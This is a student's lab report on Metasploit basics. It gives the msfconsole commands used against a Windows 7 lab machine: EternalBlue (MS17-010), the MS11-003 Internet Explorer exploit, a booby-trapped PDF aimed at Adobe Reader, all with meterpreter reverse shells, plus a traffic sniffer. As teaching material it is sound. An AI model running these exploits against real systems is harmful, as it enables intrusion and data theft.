20182217刘洪宇_Exp6 MSF应用基础

1. 实践内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,ms17_010; (1分)

  •  关闭靶机win7的防火墙

  • 20182217刘洪宇_Exp6 MSF应用基础
  •  查看靶机是否有这个漏洞

 

msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.43.82(靶机IP)
exploit

 

  20182217刘洪宇_Exp6 MSF应用基础

 

 

 

  • 用另一台kali进行攻击
  use exploit/windows/smb/ms17_010_eternalblue(选择该漏洞)
  set payload windows/x64/meterpreter/reverse_tcp(设置攻击的载荷)
  set rhosts 192.168.43.82(靶机IP)
  set lhosts 192.168.43.96(kaliIP)
  exploit

  

20182217刘洪宇_Exp6 MSF应用基础

 

 

 

  • 连接成功后获取shell,输入shell进行验证

 20182217刘洪宇_Exp6 MSF应用基础

 

 

 

 

1.2 一个针对浏览器的攻击,ms11_003;

  • 关闭win7防火墙
  • 在msfconsole里搜索漏洞模块
    msfconsole 
    search ms11-003

  20182217刘洪宇_Exp6 MSF应用基础

 

 

  • 找到后生成攻击网址
      use exploit/windows/browser/ms11_003_ie_css_import
      set payload windows/meterpreter/reverse_tcp
      show options
      set srvhost 192.168.43.96(kaliIP)
      exploit

  20182217刘洪宇_Exp6 MSF应用基础

 

 

  • 将生成的网址http://192.168.43.96:8080/vlcgEr,在靶机里用ie浏览器打开

 20182217刘洪宇_Exp6 MSF应用基础

 

 

  • 查看会话(连接后msf里直接看不见,但是创建了会话,可以通过会话进入连接)

 

sessions
sessions 1

 

 

  20182217刘洪宇_Exp6 MSF应用基础

 

 

  • 获取shell,运行命令验证

  20182217刘洪宇_Exp6 MSF应用基础

 

 

 

 

1.3 一个针对客户端的攻击,如Adobe或office

  • 通过msfconsole生成的伪装pdf文件
    msfcomsole  
    use exploit/windows/fileformat/adobe_cooltype_sing(或58)
    (设置exploit后,有一行默认payload windows/meterpreter/reverse_tcp,所以payload可以不用设,可以使用默认的)
    show options exploit

  20182217刘洪宇_Exp6 MSF应用基础

 

 

 20182217刘洪宇_Exp6 MSF应用基础

 

 

 

  • 通过局域网共享文件夹,将生成的msf.pdf移动到靶机里

  20182217刘洪宇_Exp6 MSF应用基础

 

 

  20182217刘洪宇_Exp6 MSF应用基础

 

 

 

  • 在win7中下载Adobe Reader 9.3

  20182217刘洪宇_Exp6 MSF应用基础

 

 

 

  • msf监听

      use exploit/windows/multi/handler
      exploit

  

  • 连接后,获取shell,运行ipconfig并验证回连成功

20182217刘洪宇_Exp6 MSF应用基础

 

 

 

1.4 成功应用任何一个辅助模块,嗅探sniffer。

  • 靶机win7
  • msfconsole
    search sniff
    use auxiliary/sniffer/psnuffle
    show options
    exploit  
  •  靶机访问www.baidu.com

  20182217刘洪宇_Exp6 MSF应用基础

 

 

20182217刘洪宇_Exp6 MSF应用基础

  • kali返回嗅探内容,可以看到嗅探成功
  • 20182217刘洪宇_Exp6 MSF应用基础

2.问题回答

2.1.基础问题回答 

(1)用自己的话解释什么是exploit,payload,encode.

  • exploit就是利用一些工具的,用来收集目标靶机的这种漏洞或者个人信息,并可以进行一些比如摄屏、提权等操作。
  • payload是在目标主机上创建会话连接的,是一个负载,可以负载程序或者数据等到目标靶机,实现攻击。
  • encode是一个加密的工具,可以加密信息或者文件,比如对对payload进行编码加工。

2.2.实践总结与体会

  • 本次实验可以说是十分艰难了,主要在环境的配置上,我弄了很长时间才把虚拟机配置好。虽然整体实验流程并不复杂,但是仍然有过好几次失败的尝试。通过这次实验感受到了msf工具功能的强大。

2.3.离实战还缺些什么技术或步骤?

  • 我认为离实战还有很远的距离,按照我目前学习到的内容还不能做到随意的入侵别人的计算机。目前缺少如何关闭对方的防火墙;如何把自己的后门文件伪装成功注入对方的计算机中;如何将自己的攻击靶机换为目前更为流行的操作系统,比如win10。.
上一篇:Content is not allowed in prolog.解决方法


下一篇:Exp6 MSF基础应用